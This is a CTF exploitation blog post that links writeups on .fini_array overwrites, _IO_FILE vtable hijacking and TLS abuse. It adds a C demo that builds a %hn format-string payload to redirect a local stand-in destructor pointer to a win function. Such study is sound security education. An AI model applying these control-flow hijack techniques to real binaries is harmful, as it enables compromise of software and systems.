2021-07-10 18:41:19
While solving a task from redpwn CTF (I'll write my own writeup later, for sure; the task is excellent) I found some amazing writeups that review similar exploitation techniques.
1) An interesting way of exploiting a format-string bug in a binary with PIE disabled: overwriting __do_global_dtors_aux_fini_array_entry (the .fini_array slot, at a fixed address without PIE) to hijack control flow. The slot has to be writable at runtime, which RELRO prevents, so check with readelf -l whether .fini_array falls inside the GNU_RELRO segment before relying on it.
link: https://ctftime.org/writeup/20796
2) Overwriting _IO_write_ptr of a _IO_FILE and then calling exit, so the exit-time flush goes through the _IO_OVERFLOW vtable entry (the _IO_overflow_t hook) and writes out libc memory (libc leak), then replacing the vtable pointer of the _IO_FILE to hijack control flow. Since glibc 2.24 the vtable pointer is validated (_IO_vtable_check), so a forged vtable has to point into the __libc_IO_vtables section, for example at _IO_str_jumps.
link: https://hackmd.io/@ptr-yudai/ByRfC6O_H
3) Using the .tls segment (thread-local storage) for exploitation purposes.
link: https://fireshellsecurity.team/byte-bandits-look-beyond/
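For item 1, here is an added example (mine, not from any of the linked writeups) of the write-what-where primitive a format-string bug gives you, used to redirect a destructor pointer. It builds the %c/%hn payload that pwntools-style helpers generate, writes an 8-byte value as four 16-bit stores, and points a program-local array at a win function. That array (fake_fini_array) is a stand-in for the __do_global_dtors_aux_fini_array_entry slot, so the example runs however this file was linked; it assumes glibc and a little-endian host such as x86-64.

```c
#undef _FORTIFY_SOURCE          /* see real_snprintf below */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the linked writeups. fake_fini_array is a
 * program-local stand-in for the .fini_array slot of a non-PIE binary.
 * Assumes glibc and a little-endian host (e.g. x86-64). */

/* Calling through a pointer reaches the real snprintf instead of the
 * __snprintf_chk wrapper that _FORTIFY_SOURCE=2 substitutes. The wrapper
 * aborts on %n when the format string lives in writable memory, which is
 * why this primitive is unavailable in fortified builds. */
static int (*const real_snprintf)(char *, size_t, const char *, ...) = snprintf;

struct chunk { unsigned pos; uint16_t val; };   /* positional arg index, 16-bit value */

static int by_val(const void *a, const void *b)
{
    uint16_t x = ((const struct chunk *)a)->val, y = ((const struct chunk *)b)->val;
    return (x > y) - (x < y);
}

/* Write the 8-byte `value` to `target` with four %hn stores. Positional
 * args 1-4 are the four 16-bit slots of target, arg 5 is a dummy char that
 * each %c pads to the width needed to reach the next value. Chunks go out
 * in ascending order so the running character count never has to wrap.
 * Returns snprintf's character count (the largest chunk value) or -1. */
int fmt_write64(void *target, uint64_t value)
{
    uint16_t *slot[4];
    struct chunk c[4];
    for (unsigned i = 0; i < 4; i++) {
        slot[i] = (uint16_t *)((uint8_t *)target + 2 * i);  /* little-endian slot i */
        c[i].pos = i + 1;
        c[i].val = (uint16_t)(value >> (16 * i));
    }
    qsort(c, 4, sizeof c[0], by_val);

    char fmt[128];
    size_t len = 0;
    unsigned written = 0;
    for (unsigned i = 0; i < 4; i++) {
        unsigned delta = c[i].val - written;              /* never negative: sorted */
        if (delta)                                        /* %5$<delta>c pads exactly delta chars */
            len += (size_t)snprintf(fmt + len, sizeof fmt - len, "%%5$%uc", delta);
        len += (size_t)snprintf(fmt + len, sizeof fmt - len, "%%%u$hn", c[i].pos);
        written = c[i].val;
    }

    size_t out_sz = 65536 + 64;                           /* room for the longest padding run */
    char *out = malloc(out_sz);
    if (!out) return -1;
    int n = real_snprintf(out, out_sz, fmt, slot[0], slot[1], slot[2], slot[3], 'A');
    free(out);
    return n;
}

/* Stand-in for the .fini_array slot and for the runtime walking it at exit. */
static int hijacked = 0;
static void normal_dtor(void) { hijacked = 0; }
static void win(void)         { hijacked = 1; }
static void (*fake_fini_array[1])(void) = { normal_dtor };

void run_fake_fini(void)
{
    for (size_t i = 0; i < sizeof fake_fini_array / sizeof fake_fini_array[0]; i++)
        fake_fini_array[i]();
}

/* Overwrite the slot with the address of win() through the primitive, then
 * let the "runtime" call the destructors. Returns 1 if win() ran. */
int hijack_demo(void)
{
    fmt_write64(&fake_fini_array[0], (uint64_t)(uintptr_t)win);
    run_fake_fini();
    return hijacked;
}

int main(void)
{
    printf("destructor hijacked: %s\n", hijack_demo() ? "yes" : "no");
    return 0;
}
```

In a real target the format string is the attacker's input and the slot addresses sit on the stack as the "arguments"; here they are passed explicitly so the payload construction (sorting the chunks, padding with %c, storing with %hn) can be checked in isolation. Against a real .fini_array entry the same payload only works if the slot is not covered by RELRO, so check the GNU_RELRO segment first.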
#pwn #heap #tls #IO #format-string-bug #stack